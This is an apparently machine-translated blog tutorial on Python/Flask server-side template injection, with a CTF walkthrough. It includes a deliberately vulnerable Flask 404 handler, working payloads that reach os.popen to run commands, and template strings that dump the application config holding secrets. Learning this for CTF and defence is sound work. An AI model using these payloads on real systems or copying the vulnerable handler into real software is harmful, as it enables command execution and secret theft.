当前位置:网站首页>SSTI template injection explanation and real problem practice
SSTI template injection explanation and real problem practice
2022-07-06 03:47:00 【Advertising fever】
0x00 SSTI
1. What is? SSTI Inject ?
SSTI Template Injection (Server-Side Template Injection), Through the interface with the server-side template Input output interaction , In the case of lax filtering , Construct malicious input data , So as to read files or getshell Purpose , at present CTF common SSTI In question , Most of them are exams python Of .
2. Causes and utilization conditions
The website processes the output pages by the data and template framework , Our data will not change in the database , But the template of the picture can be converted in various ways , Different templates can give people different visual feelings , But when the template has controllable parameter variables or the template code has the debugging function of the template , May lead to ssti Template Injection , This injection exists for most script types . It's common for python Of CTF More test sites
3. What are the hazards ?
It can cause file reading , Command execution , Code execution, etc
paylaod Analytical reference :
0x01 Case understanding SSTI
Sensitive function phrases :
flask
render_template_string
Python Case study :
from flask import Flask
from flask import request
from flask import config
from flask import render_template_string
app = Flask(__name__)
app.config['SECRET_KEY'] = "flag{SSTI_123456}"
@app.route('/')
def hello_world():
return 'Hello World!'
@app.errorhandler(404)
def page_not_found(e):
template = '''
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3> #%s obtain 404_url Parameter the contents of the following fields , So as to input controllable variable injection
</div>
{%% endblock %%}
''' % (request.args.get('404_url'))
return render_template_string(template), 404
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
Can be python Script execution , Injection of being
adopt payload type , can RCE Read files and operate the machine
os._wrap_close In the class popen.
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__.popen('whoami').read()
0x02 CTF Case study
https://buuoj.cn/
Title Page :
structure 2-2 perform , That there is ssti Injection execution
View all global variables , Reference global variables
Use global variables to get the following config value
url_for() Function is used to build the specified function of operation URL
get_flashed_messages() The function is to get the passed data
Get global variables
/shrine/{
{url_for.__globals__}}
or
/shrine/{
{get_flashed_messages.__globals__}}
Use the current global variable to read :
/shrine/{
{url_for.__globals__['current_app'].config}}
or
/shrine/{
{get_flashed_messages.__globals__['current_app'].config}}
Add : pyc Decompile knowledge points
pyc It is also a form of script encapsulation , Be similar to
aspx:DLL file
java:.class/jar/war file
pyc Is a decompilable package , There are also those that are difficult to decompile pyd Wait for the documents
pyc Decompile reference website :
Decompile platform :
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
decompiler :https://github.com/wibiti/uncompyle2
边栏推荐
- Simple blog system
- Ks008 SSM based press release system
- Pytorch load data
- three. JS page background animation liquid JS special effect
- A brief introduction to symbols and link libraries in C language
- C#(二十七)之C#窗体应用
- Exchange bottles (graph theory + thinking)
- [001] [stm32] how to download STM32 original factory data
- cookie,session,Token 这些你都知道吗?
- [optimization model] Monte Carlo method of optimization calculation
猜你喜欢
UDP reliable transport protocol (quic)
SAP ALV cell level set color
[001] [stm32] how to download STM32 original factory data
JS Vanke banner rotation chart JS special effect
JS music online playback plug-in vsplayaudio js
Blue Bridge Cup - day of week
Pointer for in-depth analysis (problem solution)
3.1 detailed explanation of rtthread serial port device (V1)
pytorch加载数据
教你用Pytorch搭建一个自己的简单的BP神经网络( 以iris数据集为例 )
随机推荐
SWC introduction
Facebook and other large companies have leaked more than one billion user data, and it is time to pay attention to did
[optimization model] Monte Carlo method of optimization calculation
Esbuild & SWC: a new generation of construction tools
3.2 rtthread 串口设备(V2)详解
Brush questions in summer -day3
【SLAM】ORB-SLAM3解析——跟踪Track()(3)
2.2 STM32 GPIO操作
潘多拉 IOT 开发板学习(HAL 库)—— 实验9 PWM输出实验(学习笔记)
施努卡:什么是视觉定位系统 视觉系统如何定位
关于非虚函数的假派生
Force buckle 1189 Maximum number of "balloons"
[practical exercise] face location model based on skin color
Blue Bridge Cup - day of week
Cf464e the classic problem [shortest path, chairman tree]
1、工程新建
有条件地 [JsonIgnore]
Ybtoj coloring plan [tree chain dissection, segment tree, tarjan]
JVM的手术刀式剖析——一文带你窥探JVM的秘密
mysql从一个连续时间段的表中读取缺少数据